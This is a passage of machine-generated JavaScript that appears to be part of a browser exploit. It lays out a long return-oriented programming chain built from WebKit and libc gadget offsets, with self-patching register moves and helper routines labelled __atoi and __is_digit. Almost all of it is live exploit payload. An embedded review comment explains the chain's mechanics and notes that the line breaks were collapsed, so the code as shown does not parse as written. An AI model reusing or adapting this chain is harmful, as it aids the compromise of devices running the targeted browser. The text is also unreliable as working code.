set_gadget(webkit_base+3236123,); //pop r9 //L2865: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2866: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2867: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+181808, //L2869 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2869: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+181936, //L2871 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+181952, //L2872 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+181920, 
//L2870 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2870: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2871: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2872: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+182032, //L2873 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+182048, //L2874 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2873: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2874: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+182160, //L2875 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+182192, //L2877 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+182176, //L2876 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2875: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2876: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2877: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+2115150, //setle al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+182368, //L2879 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+182384, //L2880 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+182352, //L2878 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 
//pop r9 ]); //L2878: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2879: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2880: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+182544, //L2885 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+182560, //L2886 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+182496, //L2882 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2882: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2883: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L2884: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2885: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2886: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+182672, //L2887+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+182664, //L2887 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L2887: db([0, 0]); // 0x0 set_gadgets([ ropchain+182688, //L2887+24 ropchain+184448, //L2881 libc_base+764760, //pop rsi ropchain+182728, //L2888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2888: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2890: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+182848, //L2893 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+182832, //L2891 webkit_base+660161, //mov [rsi], rax 
; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2891: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2893: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+183008, //L2897 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+182976, //L2895 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+182992, //L2896 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2894: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2895: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2896: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2897: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+183064, //L2899 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2899: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+183192, //L2901 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+183208, //L2902 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+183176, //L2900 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2900: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2901: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2902: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+183368, //L2906 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+183336, //L2904 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+183352, //L2905 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2903: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2904: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2905: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2906: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+183424, //L2908 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2908: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+183552, //L2910 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+183568, //L2911 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+183536, //L2909 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2909: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2910: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2911: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+183648, //L2912 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+183664, //L2913 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2912: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2913: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+183760, //L2915 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+183744, //L2914 webkit_base+660161, //mov [rsi], rax 
; mov al, 1 libc_base+144605 //pop rdi ]); //L2914: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2915: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+183840, //L2916 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2916: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2917: db([57, 0]); // 0x39 set_gadget(libc_base+144605,); //pop rdi //L2918: db([57, 0]); // 0x39 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+183984, //L2919 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+184016, //L2921 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+184000, //L2920 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2919: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2920: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2921: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+2115150, //setle al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+184192, //L2923 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+184208, //L2924 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+184176, //L2922 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2922: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L2923: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2924: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+184352, //L2927 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+184368, //L2928 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+184320, //L2925 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2925: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2926: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L2927: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2928: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+184440, //L2929 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2929: db([0, 0]); // 0x0 //L2881: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+184504, //L2932 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L2931: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2932: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+184584, //L2934 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L2933: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2934: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+184712, //L2935 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+184744, //L2937 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+184728, //L2936 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2935: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2936: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2937: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+184848, //L2938 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+184864, //L2939 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2938: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2939: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+184984, //L2940 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+184968, //L2941 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2941: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2940: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+185072, //L2943 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+185056, //L2942 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2942: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2943: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+185176, //L2944 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+185192, //L2945 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2944: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2945: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+185312, //L2946 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+185296, //L2947 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2947: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2946: db([0, 0]); // 0x0 //__atoi: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+185384, //L2949 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2949: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+185448, //L2951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2951: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2952: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2954: db([4294967292, 4294967295]); // -0x4 
// NOTE(review): machine-generated ROP chain data. This line comes after the `//__atoi:`
// label and before any later routine label, so it presumably belongs to that routine.
// Reading aid, based on the helper definitions at the top of the file and on the
// per-gadget comments in the listing:
//  - set_gadget()/set_gadgets() append 64-bit entries (two 32-bit words each) to
//    ropchain_array; db() appends raw 32-bit words.
//  - Most `//Lnnnn:` labels mark an 8-byte db([...]) slot that directly follows a
//    `pop <reg>` gadget. The recurring triple `pop rsi; ropchain+<offset>; mov [rsi], rax`
//    writes rax into such a slot at run time and the preceding pop then loads it, so the
//    chain patches its own operands to move values between registers.
//  - The ropchain+<offset> constants are byte offsets from the chain base (8 bytes per
//    entry), i.e. position-dependent generated data rather than hand-written code.
//  - The page extraction collapsed the original line breaks: as shown, everything after
//    the first `//` on this line is parsed as comment text, not as statements.
set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+185576, //L2956 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2955: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2956: db([0, 0]); // 0x0 set_gadgets([ webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+185632, //L2958 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2958: db([0, 0]); // 0x0 //L2957: set_gadgets([ libc_base+764760, //pop rsi ropchain+185680, //L2960 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2960: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2962: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+185800, //L2965 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+185784, //L2963 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2963: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2965: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+185880, //L2966 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+185896, //L2967 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2966: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2967: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+185976, //L2968 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+185992, //L2969 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); 
//L2968: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2969: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+186152, //L2973 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+186120, //L2971 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+186136, //L2972 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2970: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2971: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2972: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2973: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+186208, //L2975 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2975: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+186336, //L2977 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+186352, //L2978 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+186320, //L2976 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2976: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2977: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2978: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+186512, //L2982 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+186480, //L2980 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, 
//pop rsi ropchain+186496, //L2981 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2979: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2980: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2981: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2982: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+186568, //L2984 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2984: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+186696, //L2986 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+186712, //L2987 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+186680, //L2985 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2985: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2986: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2987: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+186872, //L2991 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+186840, //L2989 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+186856, //L2990 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2988: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2989: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2990: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2991: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi 
ropchain+186928, //L2993 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2993: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+187056, //L2995 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+187072, //L2996 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+187040, //L2994 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2994: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2995: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2996: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+187152, //L2997 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+187168, //L2998 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2997: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2998: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+187264, //L3000 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+187248, //L2999 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2999: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3000: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L3002: ropchain+187368, //L3001 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], 
rax libc_base+782311, //pop rsp ropchain+180736, //__is_digit //L3001: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+187496, //L3005 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+187480, //L3004 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3003: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3004: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3005: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+187552, //L3007 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3007: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+187680, //L3009 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+187696, //L3010 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+187664, //L3008 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3008: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3009: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3010: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, 